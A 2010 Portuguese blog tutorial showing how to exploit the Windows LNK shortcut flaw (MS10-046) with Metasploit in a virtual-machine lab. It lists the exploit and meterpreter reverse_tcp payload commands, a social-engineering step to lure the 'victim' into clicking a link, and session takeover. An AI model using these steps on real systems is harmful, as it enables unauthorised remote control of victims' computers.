sábado, 4 de dezembro de 2010

Metasploit – Explorando vulnerabilidade “LNK” em Windows

Metasploit Framework é uma ferramenta fantástica, usada para fazer auditoria e testes de penetração etc, onde possue um grande framework de exploits para várias aplicações de diversos tipos!

Nesse tutorial, mostrei uma falha que afeta todas as versões do windows que se diz respeito a manipulação de arquivos “.LNK“, esta falha, como o exploit, tornaram público em Julho de 2010.

O mais interessante é que depois de descoberto a falha, a Microsoft só foi lançar uma correção 1 mês depois, deixando assim milhares de máquinas vulneváveis.

Requisitos

No meu computador, utilizo máquinas virtuais para testes de penetração, onde assim não prejudico ninguem da minha rede e nem a mim mesmo, pois uma invasão sem autorização é crime, fique ligado ;)

Pois bem, aqui utilizo 2 máquinas virtuais.

Windows XP (sem SP) com o IP: 192.168.1.142

BackTrack R1 (Já tem o R2 pra download) com o IP: 192.168.1.183


Estou utilizando a máquina virtual “Vmware Workstation 7“. Caso não conheça a VMware, use o google e conheçerá.

Iniciando

Antes de tudo, vamos atualizar o Metasploit, então na shell digitamos:

root@bt:~# cd /pentest/exploits/framework3

e no diretório do MSF, usamos o comando “svn update” para atualiza-ló.

Ps: Para atualiza-ló, você tem que está no diretório do MSF3

Depois de atualizado, vamos inicialo pelo comando:

root@bt:/pentest/exploits/framework3# msfconsole

Console do MSFConsole do MSF

Agora vamos selecionar o exploit que iremos utilizar. Utilizo o comando “Search” para pesquisar o exploit, ou payload etc.

Agora vamos utilizar o exploit pelo comando “use” e o caminho onde se encontra o mesmo.

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Depois de selecionado o exploit, exprerimente utilizar o comando “info“.O mesmo apresenta informações detalhadas sobre o exploit e falha.

Depois de setamos o exploit, vamos selecionar o payload. Usarei o Payload meterpreter.

msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

Agora vamos seguir a seguinte configuração do exploit:


Onde:

set LHOST 192.168.1.183 = Meu ip

exploit = Para lançar o exploit.

Agora vamos usar a nossa engenharia social e pedir pra vitima clicar no link “http://192.168.1.183/”.


Agora no BackTrack vamos digitar o comando “sessions -r“, esse comando lista todas as sessões ativas no momento ou não.

Para entrar na sessão 1, vamos usar o comando “sessions -i 1

Game over :)

Já estamos dentro do computador alvo, para provar isso, digite o comando “sysinfo“, onde ele irá mostrar algumas informações básicas da nossa vítima.

0 comentários:

Postar um comentário

 
Design by Eddy Oliveira